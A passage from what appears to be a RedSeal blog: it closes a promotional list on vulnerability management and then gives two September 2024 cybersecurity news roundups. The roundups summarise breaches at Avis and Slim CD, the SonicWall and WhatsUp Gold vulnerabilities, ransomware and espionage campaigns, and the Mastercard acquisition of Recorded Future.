  4. Enhance risk assessment: Accurate prioritization of vulnerabilities requires additional context beyond what traditional scanners provide. RedSeal offers network and business context, improving the accuracy of your risk assessments and helping you prioritize remediation efforts more effectively.
  5. Contain unpatched vulnerabilities: RedSeal identifies precise access paths and assets for containing unpatched vulnerabilities, reducing the risk of exploitation and enhancing your response capabilities.
  6. Consolidate vulnerability data: Managing data from multiple scanners and vendors can be challenging. RedSeal consolidates this information, providing a unified view of your vulnerability landscape and streamlining your management efforts.
  7. Integrate with third-party solutions: Push scan coverage analysis to third-party solutions like Rapid7 and Tenable. RedSeal enhances the effectiveness of these tools by providing comprehensive network insights that improve scan accuracy and coverage.

Incorporating RedSeal into your vulnerability management program transforms how you approach security. By addressing the limitations of traditional scanners and leveraging RedSeal’s advanced capabilities, you can build a more resilient and responsive vulnerability management strategy.  Reach out to RedSeal or schedule a demo today to learn how to bolster your cybersecurity efforts and make the strategic move that promises long-term benefits and peace of mind.

Cyber News Roundup for September 13, 2024

Recent cybersecurity updates include the National Vulnerability Database (NVD) struggling with a critical backlog, which hampers its effectiveness in vulnerability analysis. SonicWall is dealing with a significant access control vulnerability (CVE-2024-40766) in SonicOS, currently exploited in the wild. Avis has disclosed a breach affecting nearly 300,000 customers. On a positive note, Google Cloud has introduced new air-gapped backup vaults to boost ransomware protection, and MasterCard is set to acquire Recorded Future for $2.65 billion.

Read these stories and more in today’s Cyber News Roundup.

 

The Fall of the National Vulnerability Database

The National Vulnerability Database (NVD) has experienced a significant slowdown, leaving thousands of vulnerabilities without analysis, which is critical for identifying risks. This has raised concerns in the cybersecurity community, especially as many organizations and government contractors rely on NVD for vulnerability management. The issues stem from a backlog, underfunding, and challenges in handling the increasing volume of CVEs. While alternatives like Open Source Vulnerabilities (OSV) exist, NVD remains essential for many, especially under federal requirements​. (Darkreading)

 

SonicWall vulnerability exploited in the wild

A recently patched access control vulnerability (CVE-2024-40766) affecting SonicWall’s SonicOS is being exploited in the wild, BleepingComputer reports. The vulnerability affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions. SonicWall urges customers to apply the patch as soon as possible. The company adds, “SonicWall strongly advises that customers using GEN5 and GEN6 firewalls with SSLVPN users who have locally managed accounts immediately update their passwords to enhance security and prevent unauthorized access. Users can change their passwords if the ‘User must change password’ option is enabled on their account. Administrators must manually enable the ‘User must change password’ option for each local account to ensure this critical security measure is enforced.” (Bleepingcomputer)

 

Car rental company Avis discloses data breach

According to notification letters sent to customers on Wednesday and filed with California’s Office of the Attorney General, the breach, which was discovered last Thursday, saw the unknown threat actor having access to its business applications from August 3 until August 6, resulting in the theft of “some customers’ personal information, including their names and other undisclosed sensitive data.” This is a developing story. (BleepingComputer)

 

Wisconsin Medicare users had information leaked in MOVEit breach

More fallout from the MOVEIt breach of last year: “the Centers for Medicare & Medicaid Services (CMS), which is a federal agency that manages the Medicare program, as well as the Wisconsin Physicians Service Insurance Corporation (WPS) said on Friday that they have begun notifying people whose personal information leaked after hackers exploited a vulnerability in the MOVEit software.” The discovery follows a second investigation into the breach conducted by WPS in May, after receiving “new information” about the breach. (The Record)

 

1.7 million impacted in payment processing breach

In an ironic twist, payment gateway provider Slim CD says they’ve swiftly initiated an investigation into a breach affecting around 1.7 million individuals. While the company claims to be moving quickly to address the issue, the breach actually occurred in August 2023 but went undetected until almost a year later in June 2024. Information exposed in the attack includes names, physical addresses, credit card numbers, and payment card expiration dates. Despite the impact, Slim CD has not offered any free identity theft protection services to those affected, instead advising individuals to stay vigilant and order a free credit report. (Bleeping Computer)(The Register)

 

Avis breach impacts almost 300,000 customers

An update to a story we first brought to you on Monday: Car rental company Avis is now reporting that a breach discovered last week has impacted over 299,000 of its customers, which, according to Bleeping Computer, is less than 1% of the company’s customer base. The threat actor was able to access business applications last month and stole personal information, including names and other undisclosed data. (Bleeping Computer)

 

New RaaS operation is recruiting criminal affiliates

Palo Alto Networks’ Unit 42 has published a report on Repellent Scorpius, a ransomware-as-a-service operation that surfaced in May 2024. The group distributes the Cicada3301 ransomware and conducts double-extortion attacks by exfiltrating data before deploying the ransomware. The researchers state, “Unit 42 has evidence to suggest that the Repellent Scorpius operators have developed a RaaS affiliate program. It operates a control panel for affiliates and ransom payment pages for victims, and actively recruits initial access brokers (IAB) and network intruders on Russian-language cybercrime forums.” (PalloAlto)

 

Earth Preta deploys new malware in the Asia-Pacific

Trend Micro is tracking new variants of malware used by the China-aligned threat actor Earth Preta (also known as “Mustang Panda”). The threat actor is using spearphishing emails and removable drives to deploy malware against government entities in the Asia-Pacific region. Trend Micro states, “Earth Preta employed a variant of the worm HIUPAN to propagate PUBLOAD into their targets’ networks via removable drives. PUBLOAD was used as the main control tool for most of the campaign and to perform various tasks, including the execution of tools such as RAR for collection and curl for data exfiltration. PUBLOAD was also used to introduce supplemental tools into the targets’ environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option.” (Trendmicro)

 

Slim CD notifies 1.7M customers of data breach

Electronic payment firm, ESlim CD, has notified nearly 1.7 million credit card holders that their data may have been stolen after an attacker accessed their systems between August 17, 2023, and June 15, 2024. A third party investigation uncovered the incident on June 15. Slim CD said it reviewed its data privacy and security policies and implemented additional safeguards following the incident. KnowBe4 awareness advocate, James McQuiggan said, “When organizations realize that cybercriminals are inside their network for long periods, there is a gap with continuous security monitoring. Accompanied by a robust Security Incident Management (SIEM) system integrated with threat intelligence, the breach could have been detected sooner.” (SC Media)

 

Google Cloud introduces air-gapped backup vaults

Google Cloud has introduced air-gapped backup vaults as part of its enhanced Backup and Disaster Recovery (DR) service, now available in preview. These vaults provide robust protection against ransomware and unauthorized data manipulation by creating immutable and indelible backups, preventing modification or deletion until a set retention period elapses. Isolated from the customer’s Google Cloud project, these air-gapped vaults reduce the risk of direct attacks on backups. (Cyber Security News)

 

Lazarus Group’s VM Connect campaign spoofs CapitalOne

New research from Reversing Labs shows that the Lazarus Group is continuing its campaign of tempting targeting developers with malicious software packages on open-source repositories by posing as employees of the financial services firm Capital One. Again seeking to lure developers into downloading the malware by directing them to a GitHub repository containing a “homework task.” This is similar, but different from a story we reported on last week in which the Lazarus Group was seen doing the same thing through LinkedIn using CovertCatch. In this case Reversing Labs researchers says it is connected to a 2023 VMConnect campaign focused on Python modules. They added, “It is clearly intended to create a sense of urgency for the would-be job seeker, thus making it more likely that they would execute the package without performing any type of security or even source code review first.” (InfoSecurity Magazine)

 

Mastercard buys Recorded Future

Financial payment company MasterCard announced yesterday that it will acquire the threat intelligence company Recorded Future for $2.65 billion, adding to its current portfolio of security products, which include risk assessments and transaction protection. In its press release, MasterCard noted that “Recorded Future is a well-known intelligence firm that boasts more than 1,900 clients internationally, including 45 governments and over half of Fortune 500 companies.” The firm will remain an independent subsidiary, and the deal is expected to close in the first quarter of 2025. (Cyberscoop)

Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts.

Cyber News Roundup for September 6, 2024

Recent cybersecurity headlines are buzzing with urgent and dramatic developments. From a critical remote code execution flaw in Progress Software’s WhatsUp Gold to a disruptive cyberattack hitting Transport for London’s internal systems, the stakes have never been higher. Sweden is on edge over potential Russian sabotage, while a new Cicada ransomware variant is targeting VMware ESXi systems. Halliburton’s confirmation of a major data breach and the FBI’s alert on North Korean social engineering in the crypto sector only add to the urgency. Dive into these stories and more to discover what they mean for the future of cybersecurity.

 

Critical RCE flaw affects Progress Software’s WhatsUp Gold

Censys has published an advisory on a remote code execution vulnerability affecting Progress Software’s WhatsUp Gold network monitoring and management solution, SecurityWeek reports. The researchers explain, “The vulnerability exists in the GetFileWithoutZip functionality of WhatsUp Gold. An attacker can send a crafted request with directory traversal payloads to upload files to arbitrary locations on the server. By uploading malicious files, the attacker can achieve remote code execution.” Several proof-of-concept exploits have been published on GitHub, and users are urged to update to version 2023.1.3 as soon as possible. (Censys, SecurityWeek)

 

Transport for London suffers cyberattack

The local government body responsible for most of the transport system in Greater London is currently dealing with a cyberattack, but representatives state that there is no evidence that customer information was compromised during the incident. The BBC has stated that the attack mainly impacted the transport provider’s backroom systems at the corporate headquarters. (BBC News)

 

Sweden warns of heightened risk of Russian sabotage

Security companies in Sweden have reported an increase in sabotage attempts, such as flying mapping drones over defense facilities, and other “more aggressive” espionage, cyber-attacks and misinformation activities. This appears to be connected to the fact that Sweden is supporting Ukraine, and has joined NATO, and evidence of increased aggression in espionage as well as disinformation about the reliability of Swedish military products has been seen in large and small companies involved in the manufacture of weapons and related technologies. (The Guardian)

 

New Cicada variant preys on VMWare ESXi systems

This new ransomware-as-a-service group, named Cicada3301 is already quite busy, with 23 victims since mid-June, according to its leak site. Its ransomware is written in Rust and targets Windows and Linux/ESXi hosts. Researchers at Truesec analyzed a variant that targets VMware ESXi systems, and said it appears to be a version of the Windows malware. They added that “the Cicada3301 ransomware has several interesting similarities to the ALPHV ransomware.” (Security Affairs)

 

SlowTempest espionage campaign unfolds within China

Researchers at Securonix are tracking what is being called a highly coordinated espionage operation that is targeting people and organizations within China and appears to be the work of an organization with deep knowledge of Chinese language and culture. The goal of the attackers appears to be espionage, persistent access, and potential sabotage, with the end goal being to infiltrate government or high-profile business sectors. The researchers cannot say where the attacks are ultimately coming from or who is behind them, but they note that the sophisticated attack has been designed not just to gain access to their victims, but to maintain it in order to achieve broader strategic objectives, potentially aligned with state-sponsored activities. (The Record)

 

Threat actors have poisoned GlobalProtect VPN software to deliver WikiLoader

Hackers have been targeting VPNs like GlobalProtect to inject malware and steal sensitive data, compromising private networks without detection. Cybersecurity researchers at Palo Alto Networks discovered that threat actors have poisoned GlobalProtect VPN software to deliver WikiLoader, a sophisticated malware loader. Active since late 2022, WikiLoader primarily spreads via phishing but recently shifted to SEO poisoning, leading users to fake installer pages. The malware uses complex evasion techniques, including DLL sideloading and shellcode decryption, making detection difficult. WikiLoader’s operators utilize compromised WordPress sites and MQTT brokers for command and control. The malware creates persistence through scheduled tasks and hides in over 400 files within a malicious archive. Despite the malware’s complexity, it was detected by Cortex XDR through behavioral indicators. Mitigations include enhanced SEO poisoning detection, robust endpoint protection, and application whitelisting. (Cyber Security News)

 

Voldemort malware delivered via social engineering

Proofpoint describes a social engineering campaign that’s impersonating tax authorities in Europe, Asia, and the US in order to deliver a custom strain of malware dubbed “Voldemort.” The researchers explain, “The attack chain comprises multiple techniques currently popular within the threat landscape as well as uncommon methods for command and control (C2) like the use of Google Sheets. Its combination of the tactics, techniques, and procedures (TTPs), lure themes impersonating government agencies of various countries, and odd file naming and passwords like ‘test’ are notable. Researchers initially suspected the activity may be a red team, however the large volume of messages and analysis of the malware very quickly indicated it was a threat actor.” The researchers don’t attribute the activity to any particular threat actor, but they believe the campaign’s goal is cyberespionage. (Proogpoint)

 

Halliburton confirms data stolen in cyberattack

Following up on a story from last week on Cyber Security Headlines, the U.S. oil service giant confirmed Tuesday that corporate data was stolen from its computer systems during a ransomware attack it suffered in August. Halliburton stopped short of confirming a ransomware extortion scheme but said significant portions of its IT systems were disrupted. The company said it engaged law enforcement to help identify exactly what data was stolen and who they will need to notify. The company’s acknowledgement comes on the heels of CISA, the FBI, and HHS blaming the RansomHub gang for the attack. (SecurityWeek)

 

FBI warns crypto firms of aggressive North Korean social engineering

​On Tuesday, the FBI warned that North Korean hacking groups are aggressively targeting crypto company employees in sophisticated social engineering attacks. After the threat actors identify specific DeFi and crypto businesses, they then target employees with offers of new employment or investment opportunities to deploy crypto-stealing malware. The communications use fluent English and leverage detailed personal information to boost credibility and appeal. The FBI added that the threat actors are also well-versed in technical aspects of cryptocurrency. The FBI provided a list of indicators associated with North Korean social engineering activity and best practices for companies to lower the risk of compromise. (Bleeping Computer and The Record)

 

North Korean social engineering attacks target the cryptocurrency sector

The US Federal Bureau of Investigation (FBI) has issued an advisory on North Korean social engineering campaigns targeting employees in the cryptocurrency industry. The Bureau notes, “North Korean malicious cyber actors conducted research on a variety of targets connected to cryptocurrency exchange-traded funds (ETFs) over the last several months. This research included pre-operational preparations suggesting North Korean actors may attempt malicious cyber activities against companies associated with cryptocurrency ETFs or other cryptocurrency-related financial products. For companies active in or associated with the cryptocurrency sector, the FBI emphasizes North Korea employs sophisticated tactics to steal cryptocurrency funds and is a persistent threat to organizations with access to large quantities of cryptocurrency-related assets or products.” (FBI)

 

Iran paid at least $3 million in ransom following attack on banking system

POLITICO reports that Iran paid at least $3 million in ransom last month to extortionists who threatened to leak information stolen from up to 20 Iranian banks. The hacking group “IRLeaks” claimed to have stolen personal and financial data belonging to millions of Iranians. Iran hasn’t acknowledged the incident, but the country’s supreme leader said in the wake of the attack that the US and Israel are attempting “to spread psychological warfare to push us into political and economic retreat and achieve its objectives.” POLITICO cites sources as saying that IRLeaks is likely a financially motivated group, unaffiliated with a nation-state. (Politico)

 

Indictments follow swatting attack on CISA boss Easterly

Following up on the story from last December in which a swatting attack was placed on the home of Jen Easterly, two individuals have now been identified as instigating this attack along with about 100 other threats against U.S. politicians, members of Congress and senior Federal law enforcement officials. The two individuals, both in their 20s, are from Romania and Serbia. (The Record)

 

Cisco issues patches for smart licensing utility

These patches deal with two issues regarding the company’s Smart Licensing Utility. The first would allow unauthenticated attackers to access sensitive information or to log in as administrators. It exists due to “an undocumented static user credential for an administrative account present in the Utility.” The second issue is due to “excessive verbosity in a debug log file, which could allow an attacker to send a crafted HTTP request and obtain log files containing sensitive data, including credentials.” Since there are no workarounds available, Cisco recommends migrating to Smart License Utility version 2.3.0. (Security Week)

 

Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts.